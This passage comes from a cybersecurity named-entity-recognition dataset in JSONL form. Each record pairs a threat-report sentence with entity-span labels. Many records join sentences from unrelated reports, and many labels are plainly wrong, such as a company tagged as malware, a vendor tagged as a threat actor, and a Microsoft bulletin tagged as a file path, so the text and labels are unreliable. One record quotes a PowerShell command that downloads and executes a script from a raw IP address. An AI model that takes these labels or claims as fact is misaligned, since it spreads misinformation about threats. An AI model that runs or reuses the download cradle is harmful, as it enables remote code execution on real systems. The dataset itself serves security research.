The actors uploaded a variety of tools that they used to perform additional activities on the compromised network , such as dumping credentials , as well as locating and pivoting to additional systems on the network . We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell . Bitdefender’s investigation shows the attackers’ main methods remain to quietly infiltrate the infrastructure by establishing a foothold on an employee’s system , then move laterally across the infrastructure or elevate privileges to find critical systems that manage financial transactions or ATM networks . We also found the China Chopper webshell on the SharePoint servers , which has also been used by the Emissary Panda threat group . Of particular note is their use of tools to identify systems vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 . In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks . This webshell activity took place across three SharePoint servers hosted by two different government organizations between April 1 , 2019 and April 16 , 2019 , where actors uploaded a total of 24 unique executables across the three SharePoint servers . The timeline shows three main clusters of activity across the three webshells , with activity occurring on two separate webshells within a very small window of time on April 2 , 2019 and the activity involving the third webshell two weeks later on April 16 , 2019 . 
In April 2019 , several national security organizations released alerts on CVE-2019-0604 exploitation , including the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security . Based on the functionality of the various tools uploaded to the webshells , we believe the threat actors breach the SharePoint servers to use as a beachhead , then attempt to move laterally across the network via stolen credentials and exploiting vulnerabilities . We also observed the actors uploading custom backdoors such as HyperBro which is commonly associated with Emissary Panda . Both of these alerts discussed campaigns in which actors used the CVE-2019-0604 to exploit SharePoint servers to install the China Chopper webshell . During our research into this attack campaign , Unit 42 gathered several tools that the Emissary Panda uploaded to the three webshells at the two government organizations . We also observed the actors uploading the HyperBro backdoor to one of the webshells , as well as legitimate executables that would sideload malicious DLLs that have overlapping code associated with known Emissary Panda activity . Lastly , we saw the actor uploading a custom backdoor called HyperBro , which has been associated with Emissary Panda operations in the past . The other overlapping files are tools used by the adversary to locate other systems on the network ( etool.exe ) , check to see if they are vulnerable to CVE-2017-0144 ( EternalBlue ) patched in MS07-010 (checker1.exe) and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket ( psexec.exe ) . Also , the NCSC advisory mentioned that the actors used a file name stylecss.aspx for their webshell , which is the same filename we saw associated with China Chopper . we will provide an analysis of the HyperBro tool in an upcoming section . 
However , using NCC Group’s research published in May 2018 , we were able to discover code overlaps between these DLLs and a sideloaded DLL that ran the SysUpdate tool that the NCC group has associated with an Emissary Panda campaign . The list also includes several hack tools , such as Mimikatz for credential dumping and several compiled python scripts used to locate and compromise other systems on the local network . Unfortunately , we do not have access to the PYTHON33.hlp or CreateTsMediaAdm.hlp files , so we do not know the final payload loaded by either of these DLLs . Figure 9 shows a code comparison between the PYTHON33.dll (right) and inicore_v2.3.30.dll (left) (SHA256: 4d65d371a789aabe1beadcc10b38da1f998cd3ec87d4cc1cfbf0af014b783822 ) , which was sideloaded to run the SysUpdate tool in a previous Emissary Panda campaign .", "spans": {"ORGANIZATION: Symantec": [[17, 25], [8302, 8310]], "THREAT_ACTOR: BlackEnergy": [[91, 102]], "ORGANIZATION: Group-IB": [[139, 147]], "TOOL: email": [[180, 185], [1232, 1237], [13027, 13032]], "ORGANIZATION: bank": [[202, 206], [13298, 13302]], "ORGANIZATION: employees": [[207, 216]], "TOOL: emails": [[252, 258]], "FILEPATH: Silence.Downloader": [[278, 296]], "FILEPATH: Silence.MainModule": [[366, 384]], "MALWARE: Trojan": [[413, 419]], "FILEPATH: CMD.exe": [[462, 469]], "MALWARE: malware": [[653, 660]], "THREAT_ACTOR: Hackers": [[692, 699], [1448, 1455]], "ORGANIZATION: high-tech companies": [[714, 733]], "ORGANIZATION: chemical": [[745, 753], [6089, 6097]], "ORGANIZATION: pharmaceutical": [[758, 772]], "THREAT_ACTOR: Winnti": [[928, 934], [1439, 1445], [1561, 1567]], "MALWARE: Thyssenkrupp": [[1352, 1364]], "ORGANIZATION: manufacturer": [[1485, 1497]], "MALWARE: Komplex": [[1578, 1585]], "THREAT_ACTOR: APT28": [[1622, 1627]], "THREAT_ACTOR: OceanLotus’": [[1705, 1716]], "ORGANIZATION: foreign governments": [[1869, 1888]], "ORGANIZATION: activists": [[1891, 1900]], "ORGANIZATION: dissidents": [[1907, 1917]], "THREAT_ACTOR: 
NewsBeef": [[1941, 1949]], "ORGANIZATION: Rapid7": [[2035, 2041], [2241, 2247]], "TOOL: Dropbox": [[2094, 2101]], "THREAT_ACTOR: APT10": [[2132, 2137], [2263, 2268], [3542, 3547], [3628, 3633], [3836, 3841], [3856, 3861], [5239, 5244], [9113, 9118]], "FILEPATH: ccSEUPDT.exe": [[2293, 2305]], "ORGANIZATION: Novetta’s": [[2344, 2353]], "THREAT_ACTOR: Lazarus": [[2374, 2381]], "THREAT_ACTOR: \bMagic Hound": [[2421, 2433]], "ORGANIZATION: energy": [[2478, 2484], [9751, 9757]], "ORGANIZATION: government": [[2487, 2497], [3446, 3456], [9764, 9774]], "ORGANIZATION: technology": [[2504, 2514]], "ORGANIZATION: FireEye": [[2643, 2650], [6641, 6648], [9340, 9347], [10322, 10329], [10465, 10472], [10908, 10915], [11279, 11286]], "THREAT_ACTOR: APT33": [[2661, 2666], [4443, 4448], [4709, 4714], [5309, 5314], [5431, 5436], [5552, 5557], [5576, 5581], [5779, 5784], [6310, 6315], [6476, 6481], [6752, 6757], [6886, 6891], [7716, 7721], [8204, 8209], [8350, 8355], [8494, 8499], [8820, 8825], [10279, 10284]], "ORGANIZATION: defense": [[2739, 2746]], "ORGANIZATION: aerospace": [[2749, 2758]], "ORGANIZATION: petrochemical": [[2763, 2776]], "ORGANIZATION: \bCTU": [[2793, 2797], [2982, 2986]], "THREAT_ACTOR: Mia Ash": [[2972, 2979]], "THREAT_ACTOR: COBALT GYPSY": [[3013, 3025]], "THREAT_ACTOR: Magic Hound": [[3232, 3243]], "FILEPATH: malware": [[3362, 3369]], "ORGANIZATION: private": [[3461, 3468]], "ORGANIZATION: organizations": [[3469, 3482]], "FILEPATH: samples": [[3574, 3581]], "ORGANIZATION: enSilo": [[3743, 3749]], "FILEPATH: sample": [[4033, 4039]], "ORGANIZATION: Recorded Future’s": [[4148, 4165], [6835, 6852]], "THREAT_ACTOR: APT33’s": [[4207, 4214], [7569, 7576]], "THREAT_ACTOR: Elfin": [[4229, 4234], [6026, 6031]], "ORGANIZATION: U.S. 
Cyber": [[4339, 4349]], "MALWARE: njRAT": [[5375, 5380]], "MALWARE: AdwindRAT": [[5495, 5504]], "MALWARE: RevengeRAT": [[5509, 5519]], "TOOL: webshells": [[6003, 6012], [14802, 14811], [15284, 15293], [15336, 15345], [15754, 15763], [16353, 16362], [16475, 16484]], "ORGANIZATION: Symantec’s": [[6015, 6025]], "ORGANIZATION: engineering": [[6075, 6086]], "ORGANIZATION: healthcare": [[6130, 6140]], "ORGANIZATION: Nasr Institute": [[6208, 6222]], "THREAT_ACTOR: Group": [[6243, 6248], [6860, 6865]], "THREAT_ACTOR: APT35": [[6318, 6323]], "THREAT_ACTOR: MUDDYWATER": [[6330, 6340]], "ORGANIZATION: Recorded Future": [[6440, 6455], [7428, 7443], [7969, 7984]], "THREAT_ACTOR: Insikt": [[6853, 6859]], "THREAT_ACTOR: Nasr": [[7124, 7128]], "ORGANIZATION: Insikt": [[7330, 7336], [7654, 7660]], "FILEPATH: PlugX": [[7743, 7748]], "ORGANIZATION: Insikt Group": [[8084, 8096]], "MALWARE: RAT": [[8679, 8682]], "MALWARE: Poison Ivy": [[9060, 9070]], "THREAT_ACTOR: APT34": [[9196, 9201], [9954, 9959], [9962, 9967], [10853, 10858], [11127, 11132]], "MALWARE: PowerShell": [[9219, 9229]], "ORGANIZATION: Advanced Practices": [[9411, 9429]], "MALWARE: APT34": [[9553, 9558]], "ORGANIZATION: financial": [[9739, 9748], [11628, 11637], [11981, 11990], [13170, 13179]], "ORGANIZATION: FireEye Labs": [[9824, 9836]], "MALWARE: PICKPOCKET": [[9902, 9912]], "ORGANIZATION: FireEye’s": [[10362, 10371], [10736, 10745]], "VULNERABILITY: exploit": [[10427, 10434], [16161, 16168]], "FILEPATH: TONEDEAF": [[10609, 10617], [11362, 11370]], "ORGANIZATION: victim organizations": [[10875, 10895]], "FILEPATH: VALUEVAULT": [[10987, 10997], [11373, 11383]], "FILEPATH: LONGWATCH": [[11002, 11011], [11390, 11399]], "MALWARE: tool": [[11019, 11023]], "FILEPATH: PICKPOCKET": [[11135, 11145]], "THREAT_ACTOR: Carbanak": [[11449, 11457], [11659, 11667], [12365, 12373], [13079, 13087]], "ORGANIZATION: banks": [[11776, 11781]], "MALWARE: framework": [[11914, 11923]], "ORGANIZATION: Banks": [[12026, 12031]], "FILEPATH: 
spearphishing emails": [[12256, 12276]], "MALWARE: Cobalt Strike": [[12419, 12432]], "THREAT_ACTOR: Bitdefender’s": [[12900, 12913], [14067, 14080]], "ORGANIZATION: bank’s": [[13056, 13062]], "THREAT_ACTOR: Its": [[13213, 13216]], "THREAT_ACTOR: actors": [[13620, 13626], [15788, 15794], [15976, 15982], [16128, 16134], [16422, 16428]], "MALWARE: dumping credentials": [[13740, 13759]], "THREAT_ACTOR: Emissary Panda": [[13845, 13859], [14477, 14491], [14938, 14952], [16061, 16075], [16316, 16330], [16605, 16619], [16734, 16748], [17574, 17588], [18182, 18196]], "VULNERABILITY: vulnerability": [[13889, 13902]], "ORGANIZATION: Microsoft": [[13906, 13915]], "VULNERABILITY: CVE-2019-0604": [[13938, 13951], [15557, 15570], [16144, 16157]], "ORGANIZATION: financial transactions": [[14335, 14357]], "ORGANIZATION: ATM networks": [[14361, 14373]], "MALWARE: China Chopper webshell": [[14394, 14416], [16203, 16225]], "VULNERABILITY: CVE-2017-0144": [[14582, 14595], [16928, 16941]], "TOOL: DLL": [[14865, 14868], [17500, 17503]], "ORGANIZATION: Cyber Security Center": [[15623, 15644]], "ORGANIZATION: Canadian Center": [[15653, 15668]], "MALWARE: HyperBro": [[16018, 16026], [16692, 16700]], "ORGANIZATION: Unit 42": [[16276, 16283]], "ORGANIZATION: government organizations": [[16374, 16398]], "MALWARE: HyperBro backdoor": [[16443, 16460]], "THREAT_ACTOR: actor": [[16651, 16656]], "FILEPATH: etool.exe": [[16875, 16884]], "VULNERABILITY: EternalBlue": [[16944, 16955]], "FILEPATH: MS07-010": [[16969, 16977]], "TOOL: PsExec": [[17077, 17083]], "TOOL: Impacket": [[17095, 17103]], "FILEPATH: psexec.exe": [[17106, 17116]], "FILEPATH: stylecss.aspx": [[17189, 17202]], "FILEPATH: China Chopper": [[17274, 17287]], "FILEPATH: HyperBro": [[17325, 17333]], "ORGANIZATION: NCC": [[17380, 17383], [17541, 17544]], "MALWARE: hack tools": [[17631, 17641]], "MALWARE: Mimikatz": [[17652, 17660]], "MALWARE: python scripts": [[17705, 17719]], "FILEPATH: PYTHON33.dll": [[17991, 18003]], "FILEPATH: 
inicore_v2.3.30.dll": [[18016, 18035]], "FILEPATH: 4d65d371a789aabe1beadcc10b38da1f998cd3ec87d4cc1cfbf0af014b783822": [[18052, 18116]], "MALWARE: SysUpdate": [[18153, 18162]]}, "info": {"id": "cyberner_stix_train_006446", "source": "cyberner_stix_train"}} {"text": "After deobfuscation we extracted :", "spans": {"TOOL: deobfuscation": [[6, 19]]}, "info": {"id": "cyberner_stix_train_006447", "source": "cyberner_stix_train"}} {"text": "According to the DroidVPN app description , it “ helps bypass regional internet restrictions , web filtering and firewalls by tunneling traffic over ICMP. ” Some features may require devices to be rooted to function and according to some 3rd party app stores , unconditional rooting is required , which has additional security implications for the device . The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems . However , the malware shared several traits with the RIPTIDE and HIGHTIDE backdoor that we have attributed to APT12 .", "spans": {"MALWARE: Trojan": [[390, 396]], "MALWARE: RIPTIDE": [[538, 545]], "MALWARE: HIGHTIDE backdoor": [[550, 567]], "THREAT_ACTOR: APT12": [[595, 600]]}, "info": {"id": "cyberner_stix_train_006448", "source": "cyberner_stix_train"}} {"text": "In contrast , on the emulator , a toast message is displayed that shows “ Install completed ” , at which point FakeSpy removes its shortcut from the device 's homescreen . FIN7’s last campaigns were targeting banks in Europe and Central America . 
At least one of the attacks in this campaign leveraged a European security and defense-themed lure , which aligns with the targeting preferences for this group .", "spans": {"MALWARE: FakeSpy": [[111, 118]], "THREAT_ACTOR: FIN7’s": [[172, 178]], "ORGANIZATION: banks": [[209, 214]]}, "info": {"id": "cyberner_stix_train_006449", "source": "cyberner_stix_train"}} {"text": "PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . The developers refer to this tool by the name Kazuar , which is a Trojan written using the Microsoft.NET Framework that offers actors complete access to compromised systems targeted by its operator .", "spans": {"TOOL: PIVY": [[0, 4], [266, 270]], "ORGANIZATION: government agencies": [[96, 115]], "ORGANIZATION: defense contractors": [[118, 137]], "THREAT_ACTOR: attackers": [[208, 217]], "VULNERABILITY: zero-day vulnerability": [[225, 247]], "MALWARE: Kazuar": [[327, 333]], "MALWARE: Trojan": [[347, 353]]}, "info": {"id": "cyberner_stix_train_006450", "source": "cyberner_stix_train"}} {"text": "Afterward , it will start several timers to execute different tasks . The Gamaredon Group has been actively launching spear-phishing attacks against Ukrainian government and military departments from the mid-2013s . 
In April 2017 , APT37 targeted South Korean military and government organizations with the DOGCALL backdoor and RUHAPPY wiper malware .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[74, 89]], "ORGANIZATION: government": [[159, 169]], "ORGANIZATION: military": [[174, 182], [260, 268]], "THREAT_ACTOR: APT37": [[232, 237]], "ORGANIZATION: government organizations": [[273, 297]], "MALWARE: DOGCALL backdoor": [[307, 323]], "MALWARE: RUHAPPY wiper malware": [[328, 349]]}, "info": {"id": "cyberner_stix_train_006451", "source": "cyberner_stix_train"}} {"text": "Sending SMS messages to financial institutions to query account balances . In the past , BlackOasis messages were designed to appear like news articles from 2016 about political relations between Angola and China . The first one is the setting of the registry key “ HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\ ” & Application.Version & _ ” \\Word\\Security\\ ” and the declaration of some other variables , such as the dropurl “ geticons.ddns.net ” . In November 2016 , Volexity documented new Dukes - related activity involving spear phishing with links to a ZIP archive containing a malicious LNK file , which would run PowerShell commands to install a new custom backdoor called PowerDuke .", "spans": {"THREAT_ACTOR: BlackOasis": [[89, 99]], "ORGANIZATION: political": [[168, 177]], "ORGANIZATION: Volexity": [[466, 474]], "MALWARE: Dukes": [[490, 495]], "MALWARE: PowerDuke": [[678, 687]]}, "info": {"id": "cyberner_stix_train_006452", "source": "cyberner_stix_train"}} {"text": "This is a common technique used by malware developers to bundle the main payload inside the Android package to avoid easy detection . The most popular targets of SneakyPastes are embassies , government entities , education , media outlets , journalists , activists , political parties or personnel , healthcare and banking . 
This secondary communication channel may be used by operators when access to the hard-coded control servers is disrupted .", "spans": {"SYSTEM: Android": [[92, 99]], "THREAT_ACTOR: SneakyPastes": [[162, 174]], "ORGANIZATION: embassies": [[179, 188]], "ORGANIZATION: government entities": [[191, 210]], "ORGANIZATION: education": [[213, 222]], "ORGANIZATION: media outlets": [[225, 238]], "ORGANIZATION: activists": [[255, 264]], "ORGANIZATION: personnel": [[288, 297]], "ORGANIZATION: healthcare": [[300, 310]], "ORGANIZATION: banking": [[315, 322]]}, "info": {"id": "cyberner_stix_train_006453", "source": "cyberner_stix_train"}} {"text": "The file was created at C:\\Documents and Settings\\Admin\\Local Settings\\Temp\\sloo.exe .", "spans": {"FILEPATH: Settings\\Temp\\sloo.exe": [[62, 84]]}, "info": {"id": "cyberner_stix_train_006454", "source": "cyberner_stix_train"}} {"text": "] com hxxp : //mailsa-qaf [ . In October 2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations' , and characterized APT28 's activity as aligning with the Russian Government 's strategic intelligence requirements . After the send operation is complete, the lock file for the current run is deleted and the script . In addition , Hack520 ’s tweets always show photos of the same animal , which is likely his pet pig .", "spans": {"ORGANIZATION: FireEye": [[48, 55]], "THREAT_ACTOR: APT28": [[65, 70], [145, 150]], "THREAT_ACTOR: Hack520": [[358, 365]]}, "info": {"id": "cyberner_stix_train_006455", "source": "cyberner_stix_train"}} {"text": "A TrickMo Kill Switch One of the most interesting features of the TrickMo malware is having its own kill switch . Another attack group , Earworm ( aka Zebrocy ) , has been active since at least May 2016 and is involved in what appears to be intelligence gathering operations against military targets in Europe , Central Asia , and Eastern Asia . 
After getting the IP , the ProjectSauron component tries to communicate with the remote server using its own ( ProjectSauron ) protocol as if it was yet another C&C server .", "spans": {"MALWARE: TrickMo": [[2, 9]], "MALWARE: TrickMo malware": [[66, 81]], "THREAT_ACTOR: attack group": [[122, 134]], "THREAT_ACTOR: Earworm": [[137, 144]], "THREAT_ACTOR: Zebrocy": [[151, 158]], "MALWARE: ProjectSauron": [[373, 386], [457, 470]], "TOOL: C&C": [[507, 510]]}, "info": {"id": "cyberner_stix_train_006456", "source": "cyberner_stix_train"}} {"text": "It is noteworthy that BusyGasper supports the IRC protocol which is rarely seen among Android malware . In this latest discovery by McAfee , despite a short pause in similar operations , the Lazarus group targets financial organizations . At the same time , code embedded within this file also executed a powershell command to download and execute a copy of chfeeds.vbe from the C&C server . [System.Net.ServicePointManager] : :S erverCertificateValidationCallback={$true};IEX (New-Object Net.WebClient ) .DownloadString ( ' https://217.147.168.46:8088/index.jpg ' ) . 
Other big stories in June include a suspected LockBit affiliate arrest , the Royal ransomware gang toying with a new encryptor , and a notable increase in attacks on the Manufacturing sector .", "spans": {"MALWARE: BusyGasper": [[22, 32]], "SYSTEM: Android": [[86, 93]], "ORGANIZATION: McAfee": [[132, 138]], "THREAT_ACTOR: Lazarus group": [[191, 204]], "ORGANIZATION: financial organizations": [[213, 236]], "TOOL: powershell": [[305, 315]], "FILEPATH: chfeeds.vbe": [[358, 369]], "TOOL: C&C server": [[379, 389]], "URL: https://217.147.168.46:8088/index.jpg": [[525, 562]], "THREAT_ACTOR: LockBit": [[615, 622]], "THREAT_ACTOR: Royal ransomware gang": [[646, 667]], "TOOL: new encryptor": [[682, 695]], "ORGANIZATION: Manufacturing sector": [[739, 759]]}, "info": {"id": "cyberner_stix_train_006457", "source": "cyberner_stix_train"}} {"text": "TRITON Attribution : Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers .", "spans": {"MALWARE: TRITON": [[0, 6], [95, 101]]}, "info": {"id": "cyberner_stix_train_006458", "source": "cyberner_stix_train"}} {"text": "ejtmjealr.com gefinsioje.com gesofgamd.com ponedobla.bit .", "spans": {"DOMAIN: ejtmjealr.com": [[0, 13]], "DOMAIN: gefinsioje.com": [[14, 28]], "DOMAIN: gesofgamd.com": [[29, 42]], "DOMAIN: ponedobla.bit": [[43, 56]]}, "info": {"id": "cyberner_stix_train_006459", "source": "cyberner_stix_train"}} {"text": "We therefore believe the Dukes to be a single , large , wellcoordinated organization with clear separation of responsibilities and targets .", "spans": {"THREAT_ACTOR: Dukes": [[25, 30]]}, "info": {"id": "cyberner_stix_train_006460", "source": "cyberner_stix_train"}} {"text": "This host was registered in late March and appears to be unique to this campaign .", "spans": {}, "info": {"id": "cyberner_stix_train_006461", "source": "cyberner_stix_train"}} {"text": "The body contains a message and URL . 
As a result of our analysis of APT10 's activities , we believe that it almost certainly benefits from significant staffing and logistical resources , which have increased over the last three years , with a significant step-change in 2016 . OceanLotus : stellefaff.com 7244 . While COSMICENERGY ’s capabilities are not significantly different from previous OT malware families ’ , its discovery highlights several notable developments in the OT threat landscape .", "spans": {"THREAT_ACTOR: APT10": [[69, 74]], "THREAT_ACTOR: OceanLotus": [[279, 289]], "DOMAIN: stellefaff.com": [[292, 306]], "MALWARE: COSMICENERGY ’s": [[320, 335]], "MALWARE: OT malware families": [[395, 414]]}, "info": {"id": "cyberner_stix_train_006462", "source": "cyberner_stix_train"}} {"text": "It has modular architecture implemented in the form of plugins , or it can receive new .NET source code , which will be compiled on the device in runtime . From the beginning of 2019 until July , we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia , Central Asia and regions of Ukraine with ongoing military conflicts . 
In 2017 , APT37 targeted a Middle Eastern company that entered into a joint venture with the North Korean government to provide telecommunications service to the country ( read on for a case study ) .", "spans": {"SYSTEM: .NET": [[87, 91]], "THREAT_ACTOR: threat actor": [[277, 289]], "THREAT_ACTOR: APT37": [[397, 402]], "ORGANIZATION: company": [[429, 436]], "ORGANIZATION: telecommunications service": [[515, 541]]}, "info": {"id": "cyberner_stix_train_006463", "source": "cyberner_stix_train"}} {"text": "The command is translated to an IPacket of type GetSystemInfo .", "spans": {}, "info": {"id": "cyberner_stix_train_006464", "source": "cyberner_stix_train"}} {"text": "On disk artefacts File with the full path : %AppData%\\Video\\videodrv.exe File with the full path : %AppData%\\Platform\\sslwin.exe Files with following file hashes .", "spans": {"FILEPATH: %AppData%\\Video\\videodrv.exe": [[44, 72]], "FILEPATH: %AppData%\\Platform\\sslwin.exe": [[99, 128]]}, "info": {"id": "cyberner_stix_train_006465", "source": "cyberner_stix_train"}} {"text": "Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 .", "spans": {"THREAT_ACTOR: Patchwork": [[9, 18]], "MALWARE: RTF files": [[45, 54]], "VULNERABILITY: CVE-2017-8570": [[66, 79]], "FILEPATH: malicious.DOC": [[168, 181]], "VULNERABILITY: exploit": [[191, 198]], "ORGANIZATION: Microsoft": [[201, 210]], "TOOL: Common Controls": [[211, 226]], "VULNERABILITY: vulnerability": [[227, 240]], "VULNERABILITY: CVE-2012-0158": [[243, 256]]}, "info": {"id": "cyberner_stix_train_006466", "source": "cyberner_stix_train"}} {"text": "As with most Android ransomware , this new threat doesn ’ t actually block access to files by encrypting them . 
Leveraging click counts for the campaign for Bitly , we were able to see Gorgon Group 's activity volume increase throughout April . a conditional jump of the dispatcher predecessor’s tail instruction in goto N predecessors case , SysUpdate is a featurerich backdoor that has multiple capabilities , including", "spans": {"SYSTEM: Android": [[13, 20]], "TOOL: Bitly": [[157, 162]], "THREAT_ACTOR: Gorgon Group": [[185, 197]], "MALWARE: SysUpdate": [[343, 352]]}, "info": {"id": "cyberner_stix_train_006467", "source": "cyberner_stix_train"}} {"text": "In the past few months , Unit 42 has observed the Patchwork group , alternatively known as Dropping Elephant and Monsoon , conducting campaigns against targets located in the Indian subcontinent . Trend Micro specifically noted that the 2013 versions of KeyBoy used the same algorithm for encoding their configuration files as was observed in the Operation Tropic Trooper malware .", "spans": {"ORGANIZATION: Unit 42": [[25, 32]], "THREAT_ACTOR: Patchwork group": [[50, 65]], "THREAT_ACTOR: Dropping Elephant": [[91, 108]], "THREAT_ACTOR: Monsoon": [[113, 120]], "ORGANIZATION: Trend Micro": [[197, 208]], "MALWARE: KeyBoy": [[254, 260]]}, "info": {"id": "cyberner_stix_train_006468", "source": "cyberner_stix_train"}} {"text": "WE STILL CAN SELLING IT FOR SPAM , FAKE , BANK CRIME etc… We collect and download all of your personal data . They are selective in their attacks and wait for about three months between incidents , which is approximately three times longer than other financially motivated APT groups , like MoneyTaker , Anunak ( Carbanak ) , Buhtrap or Cobalt . We have a high level of confidence in a historic association between FIN7 and Cobalt , even though we believe that these two clusters of activity are operated by different teams . 
If scripts are not commonly used on a system , but enabled , scripts running out of cycle from patching or other administrator functions are suspicious .", "spans": {"THREAT_ACTOR: FIN7": [[415, 419]], "MALWARE: Cobalt": [[424, 430]]}, "info": {"id": "cyberner_stix_train_006469", "source": "cyberner_stix_train"}} {"text": "This makes it impossible to create a target profile . LYCEUM is an emerging threat to energy organizations in the Middle East , but organizations should not assume that future targeting will be limited to this sector . Since at least the beginning of 2014 , APT38 operations have focused almost exclusively on developing and conducting financially motivated campaigns targeting international entities , whereas TEMP.Hermit is generally linked to operations focused on South Korea and the United States .", "spans": {"THREAT_ACTOR: LYCEUM": [[54, 60]], "ORGANIZATION: energy organizations": [[86, 106]], "THREAT_ACTOR: APT38": [[258, 263]], "ORGANIZATION: international entities": [[378, 400]], "THREAT_ACTOR: TEMP.Hermit": [[411, 422]]}, "info": {"id": "cyberner_stix_train_006470", "source": "cyberner_stix_train"}} {"text": "Much like the CosmicDuke toolset , the loader used by both MiniDuke and CosmicDuke had previously only undergone one major update ( the Nemesis Gemina upgrade ) since the first known samples from 2010 .", "spans": {"MALWARE: CosmicDuke": [[14, 24], [72, 82]], "MALWARE: MiniDuke": [[59, 67]], "MALWARE: Nemesis Gemina": [[136, 150]]}, "info": {"id": "cyberner_stix_train_006471", "source": "cyberner_stix_train"}} {"text": "Of note is TA505 ’s use of the Necurs botnet to drive their massive spam campaigns .", "spans": {"THREAT_ACTOR: TA505": [[11, 16]], "MALWARE: Necurs": [[31, 37]]}, "info": {"id": "cyberner_stix_train_006472", "source": "cyberner_stix_train"}} {"text": "So far , the attackers relied entirely on social engineering to infect the targets . 
Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users . We have been presented with a rare opportunity to see some development activities from the actors associated with the OilRig attack campaign , a campaign Unit 42 has been following since May 2016 .", "spans": {"VULNERABILITY: Nitris Exploit Kit": [[112, 130]], "VULNERABILITY: CottonCastle": [[152, 164]], "THREAT_ACTOR: actors": [[332, 338]], "ORGANIZATION: Unit 42": [[395, 402]]}, "info": {"id": "cyberner_stix_train_006473", "source": "cyberner_stix_train"}} {"text": "They also download apks secretly and record audios and videos , then upload users’ privacy information to server , causing users’ privacy leakage . We dove deeper into Confucius' operations—namely , the malware-ridden documents , backdoors , and file stealers they use in their campaigns .", "spans": {"MALWARE: They": [[0, 4]]}, "info": {"id": "cyberner_stix_train_006474", "source": "cyberner_stix_train"}} {"text": "Next , if they indicate that they use an Android-based device , the Trojan , impersonating their bank with web injections , fools the victim into installing a fake security app . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . 
The January 8 attack used a variant of the ThreeDollars delivery document , which we identified as part of the OilRig toolset based on attacks that occurred in August 2017 .", "spans": {"SYSTEM: Android-based": [[41, 54]], "MALWARE: archive": [[193, 200]], "VULNERABILITY: vulnerability": [[261, 274]], "FILEPATH: ThreeDollars delivery document": [[355, 385]], "THREAT_ACTOR: OilRig": [[423, 429]]}, "info": {"id": "cyberner_stix_train_006475", "source": "cyberner_stix_train"}} {"text": "PACKING In addition to implementing custom obfuscation techniques , apps have used several commercially available packers including : Qihoo360 , AliProtect and SecShell . In the Bahamut report , we discussed two domains found within our search that were linked with a custom Android malware agent . Unlike zxFunction001, this is not used by The SCIL commands would have caused the MicroSCADA server to relay the commands to the substation RTUs via either the IEC-60870 - 5 - 104 protocol for TCP / IP connections or the IEC-60870 - 5 - 101 protocol for serial connections .", "spans": {"SYSTEM: Qihoo360": [[134, 142]], "SYSTEM: AliProtect": [[145, 155]], "SYSTEM: SecShell": [[160, 168]], "TOOL: domains": [[212, 219]], "TOOL: custom Android malware agent": [[268, 296]], "SYSTEM: MicroSCADA server": [[381, 398]]}, "info": {"id": "cyberner_stix_train_006476", "source": "cyberner_stix_train"}} {"text": "It leveraged DDE to retrieve and install a payload onto the victim host .", "spans": {}, "info": {"id": "cyberner_stix_train_006477", "source": "cyberner_stix_train"}} {"text": "The Poseidon Group is a long-running team operating on all domains : land , air , and sea . 
This attack campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes .", "spans": {"THREAT_ACTOR: Poseidon Group": [[4, 18]], "ORGANIZATION: chemical sector": [[128, 143]]}, "info": {"id": "cyberner_stix_train_006478", "source": "cyberner_stix_train"}} {"text": "The fake doesn ’ t quite nail the app name . We assess with high confidence that APT37 acts in support of the North Korean government and is primarily based in North Korea . Exfiltration is done through the bitsadmin.exe . “ And his access was never shut off until today ? , ” asked the company ’s general counsel Mike Dacks .", "spans": {"THREAT_ACTOR: APT37": [[81, 86]], "FILEPATH: bitsadmin.exe": [[207, 220]], "ORGANIZATION: company ’s general counsel": [[287, 313]], "ORGANIZATION: Mike Dacks": [[314, 324]]}, "info": {"id": "cyberner_stix_train_006479", "source": "cyberner_stix_train"}} {"text": "Strong evidence links BRONZE PRESIDENT 's infrastructure to entities within the PRC .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[22, 38]], "ORGANIZATION: PRC": [[80, 83]]}, "info": {"id": "cyberner_stix_train_006480", "source": "cyberner_stix_train"}} {"text": "CTU researchers immediately recognized suspicious commands , such as changing the working directory to recycler and executing commands from that location , that were unlikely to have been connected to legitimate system administrator operations .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_006481", "source": "cyberner_stix_train"}} {"text": "The source process tries to determine the location of dlopen , dlsym , and dlclose functions in the target process . The first Potao campaign that we examined took place in August 2011 . APT17 : 195ade342a6a4ea0a58cfbfb43dc64cb . 
